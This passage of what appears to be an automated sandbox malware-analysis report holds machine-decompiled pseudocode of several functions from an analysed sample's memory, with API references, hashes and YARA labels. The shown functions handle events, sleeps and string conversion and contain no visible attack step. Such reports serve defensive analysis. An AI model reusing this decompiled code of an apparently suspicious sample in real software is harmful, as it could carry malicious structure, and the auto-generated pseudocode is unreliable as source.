							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v156;
							if(E00A867D9(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E00A85465(_t79,  &_v156, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0xa8d168 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}





















                                                                                                                                                                                                                                0x00a84ef1
                                                                                                                                                                                                                                0x00a84efd
                                                                                                                                                                                                                                0x00a84f03
                                                                                                                                                                                                                                0x00a84f08
                                                                                                                                                                                                                                0x00a84f0c
                                                                                                                                                                                                                                0x00a8507e
                                                                                                                                                                                                                                0x00a85082
                                                                                                                                                                                                                                0x00a85082
                                                                                                                                                                                                                                0x00a84f12
                                                                                                                                                                                                                                0x00a84f16
                                                                                                                                                                                                                                0x00a84f1a
                                                                                                                                                                                                                                0x00a84f1d
                                                                                                                                                                                                                                0x00a84f28
                                                                                                                                                                                                                                0x00a84f2e
                                                                                                                                                                                                                                0x00a84f33
                                                                                                                                                                                                                                0x00a84f36
                                                                                                                                                                                                                                0x00a84f50
                                                                                                                                                                                                                                0x00a84f5f
                                                                                                                                                                                                                                0x00a84f6b
                                                                                                                                                                                                                                0x00a84f75
                                                                                                                                                                                                                                0x00a84f7a
                                                                                                                                                                                                                                0x00a84f7c
                                                                                                                                                                                                                                0x00a84f7f
                                                                                                                                                                                                                                0x00a85036
                                                                                                                                                                                                                                0x00a8503c
                                                                                                                                                                                                                                0x00a8504d
                                                                                                                                                                                                                                0x00a85060
                                                                                                                                                                                                                                0x00a85076
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8507b
                                                                                                                                                                                                                                0x00a84f88
                                                                                                                                                                                                                                0x00a84f8f
                                                                                                                                                                                                                                0x00a84f93
                                                                                                                                                                                                                                0x00a84f99
                                                                                                                                                                                                                                0x00a84f9b
                                                                                                                                                                                                                                0x00a84f9d
                                                                                                                                                                                                                                0x00a84f9f
                                                                                                                                                                                                                                0x00a84fa1
                                                                                                                                                                                                                                0x00a84fab
                                                                                                                                                                                                                                0x00a84fb0
                                                                                                                                                                                                                                0x00a84fb2
                                                                                                                                                                                                                                0x00a84fb4
                                                                                                                                                                                                                                0x00a84fb5
                                                                                                                                                                                                                                0x00a84fb6
                                                                                                                                                                                                                                0x00a84fb7
                                                                                                                                                                                                                                0x00a84fbe
                                                                                                                                                                                                                                0x00a84fc5
                                                                                                                                                                                                                                0x00a84fc8
                                                                                                                                                                                                                                0x00a84fc8
                                                                                                                                                                                                                                0x00a84f95
                                                                                                                                                                                                                                0x00a84f95
                                                                                                                                                                                                                                0x00a84f95
                                                                                                                                                                                                                                0x00a84fd0
                                                                                                                                                                                                                                0x00a84fd8
                                                                                                                                                                                                                                0x00a84fe4
                                                                                                                                                                                                                                0x00a84fe9
                                                                                                                                                                                                                                0x00a84fe9
                                                                                                                                                                                                                                0x00a84fee
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a84ff0
                                                                                                                                                                                                                                0x00a84ff3
                                                                                                                                                                                                                                0x00a85000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a85002
                                                                                                                                                                                                                                0x00a85002
                                                                                                                                                                                                                                0x00a8500f
                                                                                                                                                                                                                                0x00a84fe9
                                                                                                                                                                                                                                0x00a84fee
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a84fee
                                                                                                                                                                                                                                0x00a85019
                                                                                                                                                                                                                                0x00a8501c
                                                                                                                                                                                                                                0x00a8501f
                                                                                                                                                                                                                                0x00a85026
                                                                                                                                                                                                                                0x00a85026
                                                                                                                                                                                                                                0x00a85033
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a85033
                                                                                                                                                                                                                                0x00a84f1f
                                                                                                                                                                                                                                0x00a84f23
                                                                                                                                                                                                                                0x00a84f24
                                                                                                                                                                                                                                0x00a84f26
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a84f26
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 00A84FA1
                                                                                                                                                                                                                                • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 00A84FB7
                                                                                                                                                                                                                                • memset.NTDLL ref: 00A85060
                                                                                                                                                                                                                                • memset.NTDLL ref: 00A85076
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: memset$_allmul_aulldiv
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3041852380-0
                                                                                                                                                                                                                                • Opcode ID: 5b2b402cf2e6c8df42164eb43cc42421fa54326024539b178f07d67a4b5ce5f1
                                                                                                                                                                                                                                • Instruction ID: 4f88da8494d227e5b95dc251e0f01ca60819ef4e31d205bc69a5aae4d86c97ba
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5b2b402cf2e6c8df42164eb43cc42421fa54326024539b178f07d67a4b5ce5f1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B241A071A0021AAFDB20BF68DC41FEE77B9EF49710F104569B909A7281DB70AE45CB91
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A86C82, Relevance: 6.1, APIs: 4, Instructions: 96synchronizationCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 87%
                                                                                                                                                                                                                                			E00A86C82(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0xa8d2a8; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0xa8d2e0; // 0x105a5a8
				_t3 = _t8 + 0xa8e876; // 0x61636f4c
				_t25 = 0;
				_t30 = E00A86E66(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0xa8d2e4, 1, 0, _t30);
					E00A853BB(_t30);
				}
				_t12 =  *0xa8d294; // 0x2000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E00A8A1D4() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E00A874A5(_t32, 0);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0xa8d108( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E00A86ABB(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}














                                                                                                                                                                                                                                0x00a86c83
                                                                                                                                                                                                                                0x00a86c8a
                                                                                                                                                                                                                                0x00a86c94
                                                                                                                                                                                                                                0x00a86c98
                                                                                                                                                                                                                                0x00a86c9e
                                                                                                                                                                                                                                0x00a86cad
                                                                                                                                                                                                                                0x00a86cb4
                                                                                                                                                                                                                                0x00a86cb8
                                                                                                                                                                                                                                0x00a86cca
                                                                                                                                                                                                                                0x00a86ccc
                                                                                                                                                                                                                                0x00a86ccc
                                                                                                                                                                                                                                0x00a86cd1
                                                                                                                                                                                                                                0x00a86cd8
                                                                                                                                                                                                                                0x00a86d2f
                                                                                                                                                                                                                                0x00a86d2f
                                                                                                                                                                                                                                0x00a86d35
                                                                                                                                                                                                                                0x00a86d37
                                                                                                                                                                                                                                0x00a86d37
                                                                                                                                                                                                                                0x00a86d41
                                                                                                                                                                                                                                0x00a86d45
                                                                                                                                                                                                                                0x00a86d57
                                                                                                                                                                                                                                0x00a86d57
                                                                                                                                                                                                                                0x00a86d5b
                                                                                                                                                                                                                                0x00a86d61
                                                                                                                                                                                                                                0x00a86d61
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a86cf1
                                                                                                                                                                                                                                0x00a86cf6
                                                                                                                                                                                                                                0x00a86cfe
                                                                                                                                                                                                                                0x00a86d02
                                                                                                                                                                                                                                0x00a86d06
                                                                                                                                                                                                                                0x00a86d06
                                                                                                                                                                                                                                0x00a86d13
                                                                                                                                                                                                                                0x00a86d17
                                                                                                                                                                                                                                0x00a86d1b
                                                                                                                                                                                                                                0x00a86d70
                                                                                                                                                                                                                                0x00a86d76
                                                                                                                                                                                                                                0x00a86d76
                                                                                                                                                                                                                                0x00a86d29
                                                                                                                                                                                                                                0x00a86d2d
                                                                                                                                                                                                                                0x00a86d64
                                                                                                                                                                                                                                0x00a86d66
                                                                                                                                                                                                                                0x00a86d69
                                                                                                                                                                                                                                0x00a86d69
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a86d66
                                                                                                                                                                                                                                0x00a86d2d
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a86d17

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00A86E66: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,01AE9BB8,00000000,?,?,69B25F44,00000005,00A8D00C,?,?,00A8588F), ref: 00A86E9C
                                                                                                                                                                                                                                  • Part of subcall function 00A86E66: lstrcpy.KERNEL32(00000000,00000000), ref: 00A86EC0
                                                                                                                                                                                                                                  • Part of subcall function 00A86E66: lstrcat.KERNEL32(00000000,00000000), ref: 00A86EC8
                                                                                                                                                                                                                                • CreateEventA.KERNEL32(00A8D2E4,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,00A8521B,?,00000001,?), ref: 00A86CC3
                                                                                                                                                                                                                                  • Part of subcall function 00A853BB: RtlFreeHeap.NTDLL(00000000,00000000,00A812FA,00000000,?,?,00000000), ref: 00A853C7
                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,00004E20,00A8521B,00000000,00000000,?,00000000,?,00A8521B,?,00000001,?,?,?,?,00A8A0EC), ref: 00A86D23
                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,00A8521B,?,00000001,?), ref: 00A86D51
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,00A8521B,?,00000001,?,?,?,?,00A8A0EC), ref: 00A86D69
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 73268831-0
                                                                                                                                                                                                                                • Opcode ID: c7f504e0b09411ef71788434507f98cc43be5457a39564a4e0b7d3f06eadb95c
                                                                                                                                                                                                                                • Instruction ID: 854468cf4ee266147772d7762d041da384d517d2d58a636e7582f4140b1880df
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c7f504e0b09411ef71788434507f98cc43be5457a39564a4e0b7d3f06eadb95c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 47212C32740B559BEB31BFA89C84A6B77A9FF44760F050615F945DB255DB30DC028790
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A8516C, Relevance: 6.1, APIs: 4, Instructions: 87sleepCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 40%
                                                                                                                                                                                                                                			E00A8516C(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E00A85597(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t16 =  &(_t39[1]); // 0x5
						_t23 = _t16;
						if( *_t16 != 0) {
							E00A82C67(_t23);
						}
					}
					return _t38;
				}
				if(E00A89B32(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0xa8d2e4, 1, 0,  *0xa8d384);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E00A82D1C(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E00A84847(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E00A8704F(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E00A86C82( &_v32, _t39);
					goto L13;
				}
			}












                                                                                                                                                                                                                                0x00a8516c
                                                                                                                                                                                                                                0x00a85179
                                                                                                                                                                                                                                0x00a8517f
                                                                                                                                                                                                                                0x00a85180
                                                                                                                                                                                                                                0x00a85181
                                                                                                                                                                                                                                0x00a85182
                                                                                                                                                                                                                                0x00a85183
                                                                                                                                                                                                                                0x00a85187
                                                                                                                                                                                                                                0x00a85193
                                                                                                                                                                                                                                0x00a85197
                                                                                                                                                                                                                                0x00a8521f
                                                                                                                                                                                                                                0x00a8521f
                                                                                                                                                                                                                                0x00a85222
                                                                                                                                                                                                                                0x00a85224
                                                                                                                                                                                                                                0x00a8522c
                                                                                                                                                                                                                                0x00a8522c
                                                                                                                                                                                                                                0x00a85232
                                                                                                                                                                                                                                0x00a85235
                                                                                                                                                                                                                                0x00a85235
                                                                                                                                                                                                                                0x00a85232
                                                                                                                                                                                                                                0x00a85240
                                                                                                                                                                                                                                0x00a85240
                                                                                                                                                                                                                                0x00a851aa
                                                                                                                                                                                                                                0x00a851ac
                                                                                                                                                                                                                                0x00a851ac
                                                                                                                                                                                                                                0x00a851c3
                                                                                                                                                                                                                                0x00a851c7
                                                                                                                                                                                                                                0x00a851ca
                                                                                                                                                                                                                                0x00a851d5
                                                                                                                                                                                                                                0x00a851dc
                                                                                                                                                                                                                                0x00a851dc
                                                                                                                                                                                                                                0x00a851e5
                                                                                                                                                                                                                                0x00a851e9
                                                                                                                                                                                                                                0x00a851f7
                                                                                                                                                                                                                                0x00a851eb
                                                                                                                                                                                                                                0x00a851eb
                                                                                                                                                                                                                                0x00a851ec
                                                                                                                                                                                                                                0x00a851ed
                                                                                                                                                                                                                                0x00a851ee
                                                                                                                                                                                                                                0x00a851ef
                                                                                                                                                                                                                                0x00a851f0
                                                                                                                                                                                                                                0x00a851f0
                                                                                                                                                                                                                                0x00a851fc
                                                                                                                                                                                                                                0x00a851ff
                                                                                                                                                                                                                                0x00a85203
                                                                                                                                                                                                                                0x00a85205
                                                                                                                                                                                                                                0x00a85205
                                                                                                                                                                                                                                0x00a8520c
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8520e
                                                                                                                                                                                                                                0x00a8520e
                                                                                                                                                                                                                                0x00a8521b
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8521b

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateEventA.KERNEL32(00A8D2E4,00000001,00000000,00000040,00000001,?,747DF710,00000000,747DF730,?,?,?,00A8A0EC,?,00000001,?), ref: 00A851BD
                                                                                                                                                                                                                                • SetEvent.KERNEL32(00000000,?,?,?,00A8A0EC,?,00000001,?,00000002,?,?,00A858BD,?), ref: 00A851CA
                                                                                                                                                                                                                                • Sleep.KERNEL32(00000BB8,?,?,?,00A8A0EC,?,00000001,?,00000002,?,?,00A858BD,?), ref: 00A851D5
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00A8A0EC,?,00000001,?,00000002,?,?,00A858BD,?), ref: 00A851DC
                                                                                                                                                                                                                                  • Part of subcall function 00A82D1C: WaitForSingleObject.KERNEL32(00000000,?,?,?,00A851FC,?,00A851FC,?,?,?,?,?,00A851FC,?), ref: 00A82DF6
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2559942907-0
                                                                                                                                                                                                                                • Opcode ID: 25d8494c86fc28986e0886d27c11a7dbc9ca726c7e935be388595e71792d999c
                                                                                                                                                                                                                                • Instruction ID: d56f80a759f46c38eab4e1b98687dfe2b5b353ce7fb24abda5fe7159978c82c8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 25d8494c86fc28986e0886d27c11a7dbc9ca726c7e935be388595e71792d999c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 17218473D00619ABCF10BFF4C8859EEB7B9EB48354B054525FE51A7100EB34AD468BA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 736DA397, Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E736DA397(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t19;
				intOrPtr _t29;
				char _t31;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t41;

				_t40 = _a4;
				if(_t40 != 0) {
					_t31 = 0;
					__eflags =  *_t40;
					if( *_t40 != 0) {
						_t16 = E736DB595(_a16, 0, _t40, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t16;
						if(__eflags != 0) {
							_t38 = _a8;
							__eflags = _t16 -  *((intOrPtr*)(_t38 + 0xc));
							if(__eflags <= 0) {
								L11:
								_t17 = E736DB595(_a16, _t31, _t40, 0xffffffff,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)), _t31, _t31);
								__eflags = _t17;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t38 + 0x10)) = _t17 - 1;
									_t19 = 0;
									__eflags = 0;
								} else {
									E736DA1ED(GetLastError());
									_t19 =  *((intOrPtr*)(E736DA223(__eflags)));
								}
								L14:
								return _t19;
							}
							_t19 = E736DA9DD(_t38, __eflags, _t16);
							__eflags = _t19;
							if(_t19 != 0) {
								goto L14;
							}
							goto L11;
						}
						E736DA1ED(GetLastError());
						return  *((intOrPtr*)(E736DA223(__eflags)));
					}
					_t41 = _a8;
					__eflags =  *((intOrPtr*)(_t41 + 0xc));
					if(__eflags != 0) {
						L6:
						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = _t31;
						L2:
						 *((intOrPtr*)(_t41 + 0x10)) = _t31;
						return 0;
					}
					_t29 = E736DA9DD(_t41, __eflags, 1);
					__eflags = _t29;
					if(_t29 != 0) {
						return _t29;
					}
					goto L6;
				}
				_t41 = _a8;
				E736DA9C3(_t41);
				_t31 = 0;
				 *((intOrPtr*)(_t41 + 8)) = 0;
				 *((intOrPtr*)(_t41 + 0xc)) = 0;
				goto L2;
			}











                                                                                                                                                                                                                                0x736da39e
                                                                                                                                                                                                                                0x736da3a3
                                                                                                                                                                                                                                0x736da3c1
                                                                                                                                                                                                                                0x736da3c3
                                                                                                                                                                                                                                0x736da3c6
                                                                                                                                                                                                                                0x736da3f3
                                                                                                                                                                                                                                0x736da3fb
                                                                                                                                                                                                                                0x736da3fd
                                                                                                                                                                                                                                0x736da416
                                                                                                                                                                                                                                0x736da419
                                                                                                                                                                                                                                0x736da41c
                                                                                                                                                                                                                                0x736da42a
                                                                                                                                                                                                                                0x736da439
                                                                                                                                                                                                                                0x736da441
                                                                                                                                                                                                                                0x736da443
                                                                                                                                                                                                                                0x736da45c
                                                                                                                                                                                                                                0x736da45f
                                                                                                                                                                                                                                0x736da45f
                                                                                                                                                                                                                                0x736da445
                                                                                                                                                                                                                                0x736da44c
                                                                                                                                                                                                                                0x736da457
                                                                                                                                                                                                                                0x736da457
                                                                                                                                                                                                                                0x736da461
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da461
                                                                                                                                                                                                                                0x736da421
                                                                                                                                                                                                                                0x736da426
                                                                                                                                                                                                                                0x736da428
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da428
                                                                                                                                                                                                                                0x736da406
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da411
                                                                                                                                                                                                                                0x736da3c8
                                                                                                                                                                                                                                0x736da3cb
                                                                                                                                                                                                                                0x736da3ce
                                                                                                                                                                                                                                0x736da3e1
                                                                                                                                                                                                                                0x736da3e4
                                                                                                                                                                                                                                0x736da3b7
                                                                                                                                                                                                                                0x736da3b7
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da3ba
                                                                                                                                                                                                                                0x736da3d4
                                                                                                                                                                                                                                0x736da3d9
                                                                                                                                                                                                                                0x736da3db
                                                                                                                                                                                                                                0x736da465
                                                                                                                                                                                                                                0x736da465
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da3db
                                                                                                                                                                                                                                0x736da3a5
                                                                                                                                                                                                                                0x736da3aa
                                                                                                                                                                                                                                0x736da3af
                                                                                                                                                                                                                                0x736da3b1
                                                                                                                                                                                                                                0x736da3b4
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 736DA9C3: _free.LIBCMT ref: 736DA9D1
                                                                                                                                                                                                                                  • Part of subcall function 736DB595: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,736DD577,?,00000000,00000000), ref: 736DB637
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 736DA3FF
                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 736DA406
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 736DA445
                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 736DA44C
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 167067550-0
                                                                                                                                                                                                                                • Opcode ID: 1b95f9ec2ae9dd671f9c9aadd9b7752d2b8528a185f7bf67f6aa80960e18865d
                                                                                                                                                                                                                                • Instruction ID: b085ce134d80df771b988b60bb94c99560f4084dbd39e7e15acff4a59fea7bc9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1b95f9ec2ae9dd671f9c9aadd9b7752d2b8528a185f7bf67f6aa80960e18865d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C221C472628315BFEF119F66CC84B5AB7AEEF042647048514E82AD77C0D730DD1087A0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A81A54, Relevance: 6.1, APIs: 4, Instructions: 76sleepstringCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 78%
                                                                                                                                                                                                                                			E00A81A54(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E00A85157(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}














                                                                                                                                                                                                                                0x00a81a60
                                                                                                                                                                                                                                0x00a81a64
                                                                                                                                                                                                                                0x00a81a65
                                                                                                                                                                                                                                0x00a81a66
                                                                                                                                                                                                                                0x00a81a68
                                                                                                                                                                                                                                0x00a81a6a
                                                                                                                                                                                                                                0x00a81a6d
                                                                                                                                                                                                                                0x00a81a72
                                                                                                                                                                                                                                0x00a81b09
                                                                                                                                                                                                                                0x00a81b10
                                                                                                                                                                                                                                0x00a81b10
                                                                                                                                                                                                                                0x00a81a7b
                                                                                                                                                                                                                                0x00a81a82
                                                                                                                                                                                                                                0x00a81a92
                                                                                                                                                                                                                                0x00a81a92
                                                                                                                                                                                                                                0x00a81a98
                                                                                                                                                                                                                                0x00a81a9a
                                                                                                                                                                                                                                0x00a81a9f
                                                                                                                                                                                                                                0x00a81aa8
                                                                                                                                                                                                                                0x00a81aae
                                                                                                                                                                                                                                0x00a81ab3
                                                                                                                                                                                                                                0x00a81abe
                                                                                                                                                                                                                                0x00a81ac2
                                                                                                                                                                                                                                0x00a81ac4
